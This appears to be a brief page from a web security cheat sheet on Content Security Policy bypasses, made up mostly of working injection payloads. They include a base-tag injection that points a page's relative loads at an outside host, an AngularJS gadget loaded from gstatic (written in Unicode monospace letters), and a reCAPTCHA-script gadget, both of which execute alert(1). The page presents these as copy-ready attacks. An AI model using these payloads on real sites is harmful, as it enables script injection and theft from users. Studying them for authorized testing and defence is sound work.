CSP Bypass

CSP Evaluator

CSP Bypass

Weak CSP Bypass

1'"--><Base Href=//X55.is?

Credits: @KN0X55

CSP Bypass for gstatic

<πšœπšŒπš›πš’πš™πš πšœπš›πšŒ='//𝚠𝚠𝚠.πšπšœπšπšŠπšπš’πšŒ.πšŒπš˜πš–/πš›πšŽπšŒπšŠπš™πšπšŒπš‘πšŠ/πšŠπš‹πš˜πšžπš/πš“πšœ/πš–πšŠπš’πš—.πš–πš’πš—.πš“πšœ'></πšœπšŒπš›πš’πš™πš><πš’πš—πš™πšžπš πš’πš=𝚑 πš—πš-𝚏𝚘𝚌𝚞𝚜=$πšŽπšŸπšŽπš—πš.πšŒπš˜πš–πš™πš˜πšœπšŽπšπ™ΏπšŠπšπš‘()|πš˜πš›πšπšŽπš›π™±πš’:'(𝚣=πšŠπš•πšŽπš›πš)(𝟷)'>

Nuclei Templates

Recaptcha Abuse

<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>

Form Hijacking to bypass CSP

Resources

Last updated

Was this helpful?